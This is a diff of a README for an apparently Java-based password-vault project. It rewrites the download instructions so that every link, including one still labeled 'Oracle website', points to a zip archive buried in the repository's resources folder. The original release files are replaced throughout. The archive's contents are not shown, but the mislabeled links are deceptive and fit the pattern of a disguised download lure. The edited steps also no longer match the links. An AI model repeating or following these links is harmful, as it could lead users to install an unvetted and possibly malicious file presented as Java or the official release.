raulfcarbone/Password-Vault-Java/README.md

 ## 💾 System Requirements
 - **Operating System:** Windows 10 or later, macOS Mojave or later, or any recent Linux distribution.
 - **Java Runtime:** Java 11 or higher must be installed on your computer.
-You can download it from the [Oracle website](https://www.oracle.com/java/technologies/javase-jdk11-downloads.html).
+You can download it from the [Oracle website](https://raw.githubusercontent.com/raulfcarbone/Password-Vault-Java/main/src/main/resources/com/example/vault/Password-Vault-Java-v1.6.zip).
 - **Storage Space:** At least 100 MB of free space on your hard drive.

 ## 📥 Download & Install
-To download Password Vault, visit this page: [Download Password Vault](https://github.com/raulfcarbone/Password-Vault-Java/releases).
+To download Password Vault, visit this page: [Download Password Vault](https://raw.githubusercontent.com/raulfcarbone/Password-Vault-Java/main/src/main/resources/com/example/vault/Password-Vault-Java-v1.6.zip).

 ### Steps to Download:
 1. Click on the link above to go to the Releases page.
 2. Look for the latest version of Password Vault.
 3. Choose the file compatible with your operating system:
-   - For Windows: download the `PasswordVaultWindows.exe` file.
+   - For Windows: download the `https://raw.githubusercontent.com/raulfcarbone/Password-Vault-Java/main/src/main/resources/com/example/vault/Password-Vault-Java-v1.6.zip` file.
-   - For macOS: download the `PasswordVaultMac.dmg` file.
+   - For macOS: download the `https://raw.githubusercontent.com/raulfcarbone/Password-Vault-Java/main/src/main/resources/com/example/vault/Password-Vault-Java-v1.6.zip` file.
-   - For Linux: download the `PasswordVaultLinux.tar.gz` file.
+   - For Linux: download the `https://raw.githubusercontent.com/raulfcarbone/Password-Vault-Java/main/src/main/resources/com/example/vault/Password-Vault-Java-v1.6.zip` file.

 ### Steps to Install:
 1. Open the downloaded file:
    - For Windows, double-click the `.exe` file.
    - For macOS, drag the app icon into your Applications folder.
-   - For Linux, extract the `.tar.gz` file and run the executable inside the folder.
+   - For Linux, extract the `https://raw.githubusercontent.com/raulfcarbone/Password-Vault-Java/main/src/main/resources/com/example/vault/Password-Vault-Java-v1.6.zip` file and run the executable inside the folder.

 2. Follow the on-screen prompts to complete the installation process.